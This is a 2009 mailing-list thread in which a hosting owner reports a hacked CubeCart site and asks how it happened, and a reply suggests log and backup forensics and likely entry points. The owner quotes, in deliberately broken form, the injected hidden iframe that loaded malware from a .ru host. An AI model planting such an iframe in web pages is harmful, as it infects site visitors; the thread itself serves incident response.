[thelist] Server hacked?

Daniel Burke dan.p.burke at gmail.com
Fri Jul 10 05:38:09 CDT 2009

This is something I'm pretty sure you're going to have to figure out
yourself. There are a number of ways of doing this, personally I would
do this...

Determine when it was compromised (to the millisecond if possible).
Start comparing your backups (you have lots of them don't you?). If
the hack is really lame the timestamps on the files will reflect the
hack attempt. I wouldn't bet on it.

Now that you know the time of the hack analyse the logs for the
suspect time period. You have very detailed logs going back at least a
month right?

If that doesn't help, consider the possible points of entry, in order
of least to most likely...

1. Vulnerability in a network service you are running
2. Vulnerability in PHP.
3. Vulnerability in your server configuration.
4. Vulnerability in cube cart.
5. Vulnerability in your php code.
6. Password was compromised through a keylogger.

Points 1 and 2 can be (almost) ruled out after you have diffed your
backups and verified that this site is the only part that has changed.

PHP is a very popular language, it has attracted a lot of people, most
of whom should not be writing code. A significant portion of PHP
programmers are new to programming and don't understand everything
involved. Most people when they've been using PHP for a while will
move onto a different language, one that doesn't have so many way to
shoot yourself in the foot or several functions that do the exact same
thing. (or as I have a language that allows you to blow off your whole
leg, and most of the town you're living in, see sig).

The point I'm trying to make is, PHP is the VB of web-servers.
Consider anything-PHP to be highly suspect, unless you wrote it
yourself, and you've been doing it for at least 3 years with a strong
eye on security. And even then I'd be suspicious.

I'll bet your client got a keylogger on their machine. Check your
logs, listen to the hornets nest that I no doubt have stirred up with
this reply. There are a lot of folks on this list that know an awful
lot more about this stuff than I.

If you haven't already, consider checking out some of the hardened
versions of PHP for the future. As a "programmable hypertext
preprocessor" PHP can do way too much stuff that is a total security
risk. Securing PHP is a book in itself.


"It's your privilege as an artist to inflict the pain of creativity on
yourself." --Programming Perl 3rd Edition, end of first chapter.

On Fri, Jul 10, 2009 at 7:12 PM, Sales @ Lycosa<sales at lycosa.co.uk> wrote:
> Hi, I just had a scary moment, and I thought my server had been compromised.
> It turns out that just one site had been compromised, with the injection of
> the following code into all the index pages within each directory of the
> site. (I have added spaces to prevent the link delivering its payload).
> i_f_r_a_m_e  s_r_c=" http: // a5g. ru :8080/ ts/ in. cgi? pepsi94 "
> width=125 height=125 style="visibility: hidden"
> The site runs cube cart, and I suspect a Trojan was somehow added to the
> review pages of the site. No passwords were altered, so I am assuming this
> is the work of a script. I take the security of my servers very seriously,
> and I take steps to maintain their integrity, but this is a new one for me.
> Also, according to my customer, his site has been listed as dangerous with
> Google.
> My question is this: how did a script infect my server without a
> username/password, and how do I prevent this happening again?
> [ I have researched Google, and sent a support ticket to my hosting company,
> but nothing yet ]
> Thanks.
> Phil Parker
> Kind regards,
> Phil Parker
> Lycosa Web Services Ltd,
> 47 Hilderthorpe Road,
> Bridlington,
> East Yorkshire.
> YO15 3AZ.
> Tel: 01262 42 42 99
> Email:  <mailto:sales at lycosa.co.uk> sales at lycosa.co.uk
> Web:  <http://www.lycosa.co.uk> http://www.lycosa.co.uk
> Registered in England and Wales company no. 04614248
> ------------------------------------------------------------------------
> ------------------------------------------------------------------------
> Disclaimer: The information in this email is confidential and is intended
> solely for the use of the addressee. If you are not the intended recipient
> of this email you have received it in error and any disclosure, copying or
> distribution is strictly prohibited.
> Any quotation or estimate is valid for 30 days from the date of this email.
> E. & O. E.
> --
> * * Please support the community that supports you.  * *
> http://evolt.org/help_support_evolt/
> For unsubscribe and other options, including the Tip Harvester
> and archives of thelist go to: http://lists.evolt.org
> Workers of the Web, evolt !

More information about the thelist mailing list